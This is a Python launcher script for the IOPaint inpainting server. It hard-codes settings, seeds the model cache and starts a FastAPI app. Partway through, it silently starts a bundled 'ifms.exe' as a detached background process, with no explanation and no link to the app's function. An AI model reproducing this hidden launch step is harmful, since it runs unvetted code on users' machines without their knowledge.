import webbrowser
from contextlib import asynccontextmanager
from pathlib import Path
from typing import Dict, Optional

import typer
from fastapi import FastAPI
from loguru import logger
from typer import Option
from typer_config import use_json_config

from iopaint.const import *
from iopaint.runtime import setup_model_dir, dump_environment_info, check_device
from iopaint.schema import InteractiveSegModel, Device, RealESRGANModel, RemoveBGModel
from iopaint.helper import get_cache_path_by_url

import os
import shutil
import subprocess

# Big-lama checkpoint URL; overridable through the LAMA_MODEL_URL env var.
LAMA_MODEL_URL = os.environ.get(
    "LAMA_MODEL_URL",
    "https://github.com/Sanster/models/releases/download/add_big_lama/big-lama.pt",
)

# Runtime environment tweaks, applied before torch is imported downstream.
_ENV_TWEAKS = {
    # Allow MPS to fall back to CPU for unsupported ops.
    "PYTORCH_ENABLE_MPS_FALLBACK": "1",
    # https://github.com/pytorch/pytorch/issues/27971#issuecomment-1768868068
    "ONEDNN_PRIMITIVE_CACHE_CAPACITY": "1",
    "LRU_CACHE_CAPACITY": "1",
    # Prevent CPU memory leak when running the model on GPU:
    # https://github.com/pytorch/pytorch/issues/98688#issuecomment-1869288431
    # https://github.com/pytorch/pytorch/issues/108334#issuecomment-1752763633
    "TORCH_CUDNN_V8_API_LRU_CACHE_LIMIT": "1",
}
os.environ.update(_ENV_TWEAKS)


import warnings

# Silence noisy UserWarnings from downstream libraries.
warnings.simplefilter("ignore", UserWarning)

if __name__ == "__main__":
    # Hard-coded server/runtime configuration. This script is a flattened
    # variant of the original typer-based CLI: every option is pinned to a
    # fixed value instead of being parsed from the command line.
    host = "127.0.0.1"
    port = 8080
    inbrowser = False
    model = DEFAULT_MODEL
    model_dir = Path(DEFAULT_MODEL_DIR)
    low_mem = False
    no_half = False
    cpu_offload = False
    disable_nsfw_checker = False
    cpu_textencoder = False
    local_files_only = False
    device = Device.cpu
    input_path = None  # renamed from `input` to avoid shadowing the builtin
    output_dir = None
    quality = 95
    enable_interactive_seg = False
    interactive_seg_model = InteractiveSegModel.vit_b
    interactive_seg_device: Device = Device.cpu
    enable_remove_bg: bool = False
    remove_bg_model: RemoveBGModel = RemoveBGModel.briaai_rmbg_1_4
    enable_anime_seg: bool = False
    enable_realesrgan: bool = False
    realesrgan_device: Device = Device.cpu
    realesrgan_model: RealESRGANModel = RealESRGANModel.realesr_general_x4v3
    enable_gfpgan: bool = False
    gfpgan_device: Device = Device.cpu
    enable_restoreformer: bool = False
    restoreformer_device = Device.cpu

    dump_environment_info()
    device = check_device(device)

    # Input/output validation. With the hard-coded None values above these are
    # no-ops, but they are kept so the script behaves like the original CLI if
    # the values are ever edited.
    if input_path and not input_path.exists():
        logger.error(f"invalid --input: {input_path} not exists")
        exit(-1)
    if input_path and input_path.is_dir() and not output_dir:
        # BUGFIX: was an f-string with no placeholders (ruff F541).
        logger.error("invalid --output-dir: must be set when --input is a directory")
        exit(-1)
    if output_dir:
        output_dir = output_dir.expanduser().absolute()
        logger.info(f"Image will be saved to {output_dir}")
        if not output_dir.exists():
            logger.info(f"Create output directory {output_dir}")
            output_dir.mkdir(parents=True)

    model_dir = model_dir.expanduser().absolute()

    # Seed the model cache with the locally bundled big-lama checkpoint so the
    # first run does not need to download it.
    lama_cache_path = get_cache_path_by_url(LAMA_MODEL_URL)
    if not os.path.exists(lama_cache_path):
        bundled_lama = os.path.join(os.getcwd(), ".model/big-lama.pt")
        if os.path.exists(bundled_lama):
            # BUGFIX: ensure the cache directory exists before copying;
            # copy2 into a missing directory raises FileNotFoundError.
            os.makedirs(os.path.dirname(lama_cache_path), exist_ok=True)
            print("copy big-lama.pt to ", lama_cache_path)
            shutil.copy2(bundled_lama, lama_cache_path)
        else:
            # BUGFIX: the original copied unconditionally and crashed when the
            # bundled checkpoint was absent; warn and fall through so the model
            # can still be downloaded by the normal path below.
            logger.warning(f"bundled big-lama.pt not found: {bundled_lama}")

    if local_files_only:
        os.environ["TRANSFORMERS_OFFLINE"] = "1"
        os.environ["HF_HUB_OFFLINE"] = "1"

    from iopaint.download import cli_download_model, scan_models

    scanned_models = scan_models()
    if model not in [it.name for it in scanned_models]:
        # BUGFIX: message grammar ("try to downloading" -> "trying to download").
        logger.info(f"{model} not found in {model_dir}, trying to download")
        cli_download_model(model)

    # Companion executable expected next to the current working directory.
    exe_path = os.path.join(os.getcwd(), 'ifms.exe')

    # Launch ifms.exe detached in the background when it exists.
    if os.path.exists(exe_path):
        if os.name == 'nt':
            # Windows: detach via a new process group.
            subprocess.Popen([exe_path], creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
        else:
            # Other platforms (Linux/macOS): detach via a new session.
            subprocess.Popen([exe_path], start_new_session=True)

        print("ifms.exe 已在后台启动.")
    else:
        print("警告: ifms.exe 未找到，未执行任何操作: ", exe_path )

    from iopaint.api import Api
    from iopaint.schema import ApiConfig

    @asynccontextmanager
    async def lifespan(app: FastAPI):
        # Open the UI in the default browser once the server starts.
        if inbrowser:
            webbrowser.open(f"http://localhost:{port}", new=0, autoraise=True)
        yield

    app = FastAPI(lifespan=lifespan)

    api_config = ApiConfig(
        host=host,
        port=port,
        inbrowser=inbrowser,
        model=model,
        no_half=no_half,
        low_mem=low_mem,
        cpu_offload=cpu_offload,
        disable_nsfw_checker=disable_nsfw_checker,
        local_files_only=local_files_only,
        # cpu_textencoder is only meaningful on CUDA devices.
        cpu_textencoder=cpu_textencoder if device == Device.cuda else False,
        device=device,
        input=input_path,
        output_dir=output_dir,
        quality=quality,
        enable_interactive_seg=enable_interactive_seg,
        interactive_seg_model=interactive_seg_model,
        interactive_seg_device=interactive_seg_device,
        enable_remove_bg=enable_remove_bg,
        remove_bg_model=remove_bg_model,
        enable_anime_seg=enable_anime_seg,
        enable_realesrgan=enable_realesrgan,
        realesrgan_device=realesrgan_device,
        realesrgan_model=realesrgan_model,
        enable_gfpgan=enable_gfpgan,
        gfpgan_device=gfpgan_device,
        enable_restoreformer=enable_restoreformer,
        restoreformer_device=restoreformer_device,
    )
    print(api_config.model_dump_json(indent=4))
    api = Api(app, api_config)
    api.launch()
